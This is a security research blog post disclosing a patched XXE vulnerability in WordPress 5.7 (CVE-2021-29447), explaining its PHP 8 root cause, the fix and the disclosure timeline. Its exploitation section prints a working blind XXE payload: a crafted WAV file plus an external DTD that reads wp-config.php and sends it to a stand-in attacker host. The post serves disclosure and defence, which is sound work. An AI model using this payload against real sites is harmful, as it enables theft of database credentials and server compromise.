# WordPress 5.7 XXE Vulnerability
BY KARIM EL OUERGHEMMI|APRIL 26, 2021
At SonarSource, we are constantly improving our code analyzers and security rules. We recently improved our PHP security engine to [detect more OWASP Top 10 and CWE Top 25 issue types](https://community.sonarsource.com/t/the-php-security-engine-detects-9-additional-security-problems-related-to-xxe-cors-session-management-csrf-and-more/37986). When testing our new analyzers against some of the most popular open-source PHP projects, an interesting issue was raised in the WordPress codebase.
WordPress is the world’s most popular content management system that is used by [approximately 40% of all websites](https://w3techs.com/technologies/overview/content_management). This wide adoption makes it one of the top targets for cyber criminals. Its code is heavily reviewed by the security community and by bug bounty hunters that get paid for reporting security issues. Critical code issues rarely slip through their hands.
In this blog post we are investigating the new vulnerability reported by our analyzer. We explain its root cause, related to PHP 8, and demonstrate how an attacker could leverage it to undermine the security of a WordPress installation. We responsibly disclosed the code vulnerability to the WordPress security team who fixed it in the latest version 5.7.1 and assigned [CVE-2021-29447](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447).
[SonarCloud Vulnerability Report](https://sonarcloud.io/project/issues?id=SonarSourceResearch_wordpress.5.7.0&open=AXj-5hkLeJDscEr_Xkyb&resolved=false&types=VULNERABILITY)
## Impact
The detected code vulnerability is an authenticated XML External Entity (XXE) injection. It affects WordPress versions prior to 5.7.1 and can allow remote attackers to achieve:
- **Arbitrary File Disclosure**: the content of any file on the host’s file system could be retrieved, e.g. *wp-config.php* which contains sensitive data such as database credentials.
- **Server-Side Request Forgery (SSRF)**: HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.
The vulnerability can be exploited only when WordPress is running on PHP 8. Additionally, the permissions to upload media files are needed. On a standard WordPress installation this translates to having *author* privileges. However, combined with another vulnerability or a plugin allowing visitors to upload media files, it could be exploited with lower privileges.
WordPress released a [security & maintenance update](https://wordpress.org/support/wordpress-version/version-5-7-1/) on April 14th, 2021 to patch the vulnerability and to protect its users.
## Technical Details
In this section we take a closer look at the technical details of the vulnerability. First we briefly revisit what an XXE vulnerability is. Following that, we dive into the vulnerability our analyzer reported in the WordPress core by looking at where it is located in the code, and why it became exploitable again in PHP 8 even though there was an effort to prevent such vulnerabilities in the affected code lines. Finally, we demonstrate how it can be exploited by attackers by using specially crafted input to extract the *wp-config.php* file, and how the vulnerability is prevented.
### XML External Entity (XXE) Vulnerabilities
XML offers the possibility to define custom entities that can be reused throughout a document. This can, for example, be used to avoid duplication. The following code defines an entity myEntity for further usage.
```
<!DOCTYPE myDoc [ <!ENTITY myEntity "a long value" > ]>
<myDoc>
<foo>&myEntity;</foo>
<bar>&myEntity;</bar>
</myDoc>
```
The value of defined entities can also stem from an external source referenced by a *URI*. In this case, they are called external entities:
```
<!DOCTYPE myDoc [ <!ENTITY myExternalEntity SYSTEM "http://…..com/value.txt" > ]>
<myDoc>
<foo>&myExternalEntity;</foo>
<myDoc>
```
XXE attacks misuse this feature. They are possible when a loosely configured XML parser is run on user-controlled content. Loosely configured usually means that all entities are substituted with their corresponding value in the result. For example, in the last sample, if an attacker would supply file:///var/www/wp-config.php as the URI and is able to view the result of the parsed XML, she would successfully leak sensitive file content. However, the result of parsed XML is not always displayed back to the user, which is the case for the WordPress vulnerability described in this post. As we will see later, there are ways to cope with that.
This is the main idea and mechanism behind XXE ([learn more in our rule database](https://rules.sonarsource.com/php/RSPEC-2755)). Besides sensitive file disclosure, XXE can also have other impacts, such as *Server-Side Request Forgery* (to retrieve the content of external entities, a request has to be made, [S5144](https://rules.sonarsource.com/php/RSPEC-5144)), and *Denial of Service* (entities could reference other entities resulting in a possible exponential growth during substitution a.k.a. [Billion laughs attack](https://en.wikipedia.org/wiki/Billion_laughs_attack)).
### XXE in WordPress
WordPress has a Media Library that enables authenticated users to upload media files that can then be used in their blog posts. To extract meta information from these media files, e.g., artist name or title, WordPress uses the *getID3* library. Some of this metadata is parsed in XML form. Here, our analyzer reported a possible XXE vulnerability (line 730).
**wp-includes/ID3/getid3.lib.php**
```
723 if (PHP_VERSION_ID < 80000) {
724
725 // This function has been deprecated in PHP 8.0 because in libxml 2.9.0, external entity loading is
726 // disabled by default, so this function is no longer needed to protect against XXE attacks.
728 $loader = libxml_disable_entity_loader(true);
729 }
730 $XMLobject = simplexml_load_string($XMLstring, 'SimpleXMLElement', LIBXML_NOENT);
```
The used simplexml_load_string() function is a PHP function that parses a string passed to its first parameter as XML. It is possible to configure the underlying XML parser (PHP relies on *Libxml2*) with flags passed in the third argument.
The comments in the shown piece of code are of particular interest as they mention protection against XXE. Reading them while reviewing this finding of a static code analyzer might raise the suspicion that it is a false-positive, and that correct precautions have been taken to avoid the vulnerability. But, is it? (*Spoiler: no*)
To better understand the code and the surrounding comments, it is useful to look at its history. In 2014, an XXE vulnerability was fixed in [WordPress 3.9.2](https://wordpress.org/news/2014/08/wordpress-3-9-2/). This is the main reason the call libxml_disable_entity_loader(true) was added at that point. The PHP function libxml_disable_entity_loader() configures the XML parser to disable external entity loading.
Recently, with the release of PHP 8, the code was [slightly adapted](https://github.com/WordPress/WordPress/commit/03eba7beb2f5b96bd341255eaa30d6b612e62507) to accommodate for the deprecation of the libxml_disable_entity_loader() function and call it only if the running PHP version is older than 8. This function was deprecated because newer PHP versions use *Libxml2* v2.9+ which disables external entity fetching **by default**.
Now the subtlety in the code we are looking at is that simplexml_load_string() is not called with default configuration. Even though the name might not suggest it, the flag LIBXML_NOENT **enables** entity substitution. Surprisingly, *NOENT* in this case means that no entities will be left in the result, and thus external entities will be fetched and substituted. As a result, exploiting the XXE vulnerability that was fixed in [WordPress 3.9.2](https://wordpress.org/news/2014/08/wordpress-3-9-2/) was made possible again on WordPress instances running on PHP 8.
### Exploitation
To exploit the described vulnerability it is necessary to understand if and how user-controlled data can reach the point where it gets parsed as XML as part of the $XMLstring variable in:
**wp-includes/ID3/getid3.lib.php**
```
721 public static function XML2array($XMLstring) {
…
730 $XMLobject = simplexml_load_string($XMLstring, 'SimpleXMLElement', LIBXML_NOENT);
```
WordPress uses *getID3* to ease extraction of this metadata when files are uploaded to its media library. Investigation of the getID3 library revealed that the string being parsed at that point is the [*iXML*](http://www.ixml.info/) chunk of a wave audio file when its metadata gets analyzed.
**wp-includes/ID3/module.audio-video.riff.php**
```
426 if (isset($thisfile_riff_WAVE['iXML'][0]['data'])) {
427 // requires functions simplexml_load_string and get_object_vars
428 if ($parsedXML = getid3_lib::XML2array($thisfile_riff_WAVE['iXML'][0]['data'])) {
```
WordPress does allow uploading wave audio files, and extracts their metadata with the wp_read_audio_metadata() function (which relies on *getID3*). Thus, by uploading a crafted wave file, malicious XML can be injected and parsed. A minimal file that has the necessary structure to be handled as wave and that contains an attack payload in the *iXML* chunk can be created with the following content:
```
RIFFXXXXWAVEBBBBiXML_OUR_PAYLOAD_
```
(*BBBB* being four bytes representing the length of the XML payload in little endian.)
### Blind XXE
When an attacker injects a payload with the described strategy, the result of the parsed XML is not displayed in the user interface. Thus, to extract the content of a sensitive file (e.g., *wp-config.php*), the attacker must rely on a blind XXE technique (also called *out-of-band* XXE) to achieve this. This is similar to the technique described in [our previous blog post](https://blog.sonarsource.com/shopware-php-object-instantiation-to-blind-xxe) about exploiting Shopware. The basic idea is this:
- A first external entity (e.g., %data) is created whose value will be substituted with the content of the file.
- Another external entity is created whose URI is set to “*http://attacker_domain.com/%data;*”. Note the value of the URI contains the first entity which will be substituted.
- When resolving the second entity, the parser will make a request to “*http://attacker_domain.com/_SUBSTITUTED_data*”, making the content of the file visible in the logs of the web server.
To make the URI of the external entity dependent on a value of another substituted entity, we do use parameter entities and an external DTD. Furthermore, we make use of the php:// stream wrapper to compress and encode the content of the file. Putting things together, the following would lead to the extraction of the sensitive *wp-config.php* file:
**payload.wav**
```
RIFFXXXXWAVEBBBBiXML<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker-url.domain/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>>
```
(*BBBB* being four bytes representing the length of the XML payload in little endian.)
**xxe.dtd**
```
<!ENTITY % data SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker-url.domain/?%data;'>">
```
## Patch
WordPress patched the vulnerability in [version 5.7.1](https://wordpress.org/support/wordpress-version/version-5-7-1/) by reintroducing the call to the libxml_disable_entity_loader() function that was deprecated in PHP 8 even for newer PHP versions. To avoid PHP deprecation warnings, the PHP error suppressing operator @ was added to the call.
**wp-includes/ID3/getid3.lib.php**
```
721 public static function XML2array($XMLstring) {…727 $loader = @libxml_disable_entity_loader(true);728 $XMLobject = simplexml_load_string($XMLstring, 'SimpleXMLElement', LIBXML_NOENT);
```
Another alternative to reintroducing the call to the deprecated function would have been to make use of PHP’s [libxml_set_external_entity_loader()](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php) function. This is the recommended way according to the PHP documentation. It also allows more granular control over the external entity loader in case the possibility of loading specific resources is required. This is, of course, only necessary if entity substitution is really required in PHP 8.
## Timeline
| Date | What |
| ---------- | ------------------------------------------------------- |
| 04.02.2021 | We report the vulnerability with PoC on Hackerone |
| 05.02.2021 | WordPress acknowledges receipt of report |
| 01.03.2021 | WordPress updates us about triage and a fix in progress |
| 08.03.2021 | WordPress informs us about upcoming security release |
| 14.04.2021 | WordPress releases version 5.7.1 |
## Summary
In this blog post we looked at an interesting XXE vulnerability we discovered in the most popular content management system, WordPress. It allows authenticated attackers to leak sensitive files from the host server which can lead to a full compromise. We showed how this type of vulnerability works and how attackers can exploit it by using blind XXE techniques. Further, we learned about a related pitfall in PHP 8 code and how developers can prevent this type of code vulnerability in their own applications. We would like to thank the WordPress team for a great collaboration and a quick resolution with a new patch release.
暂无评论